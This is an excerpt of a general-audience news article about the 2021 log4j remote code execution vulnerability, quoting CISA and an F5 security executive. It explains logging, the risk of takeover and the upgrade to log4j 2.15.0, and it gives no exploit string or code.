“We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies — and signals to non-federal partners — to urgently patch or remediate this vulnerability,” CISA director Jen Easterly wrote in the statement. The bug pertains to something called log4j, and one way that software engineers can protect websites from it is to upgrade to the latest version of log4j (2.15.0). “We are proactively reaching out to entities whose networks may be vulnerable and are leveraging our scanning and intrusion detection tools to help government and industry partners identify exposure to or exploitation of the vulnerability.”
The vulnerability was first discovered by Alibaba’s security team. Here’s what to know about the exploit and log4j.
Log4j is an open-source tool used by Java programs for logging, or creating a record of everything an application has done. (Open-source tools are free and available for anyone to view to highlight bugs or vulnerabilities.)
“You want to create that record for a variety of different purposes, like being able to debug the application if something goes wrong, or be able to understand anything interesting about how the application was used,” explains Shuman Ghosemajumder, the global head of artificial intelligence at F5, an internet infrastructure and security company. “You can create your own mechanism within your own website or mobile app to record that information, or, you can use a logging program created by someone else, [like] log4j.”
Think of the string as a skeleton key that opens up the program and allows any attackers to insert their own program, that they control, on that website’s server. In theory, they could run software that allows them to completely take over that website or application.
Additionally, attackers can scan all of the websites on the internet to try and find ones that are responding to this special string of characters.
“This is what’s called a remote code execution attack,” says Ghosemajumder. “One of the things that is particularly dangerous about this is that it can give a cyber attacker a very high level of access to websites and to your accounts.”
Source : https://www.popsci.com/technology/log4j-software-vulnerability/
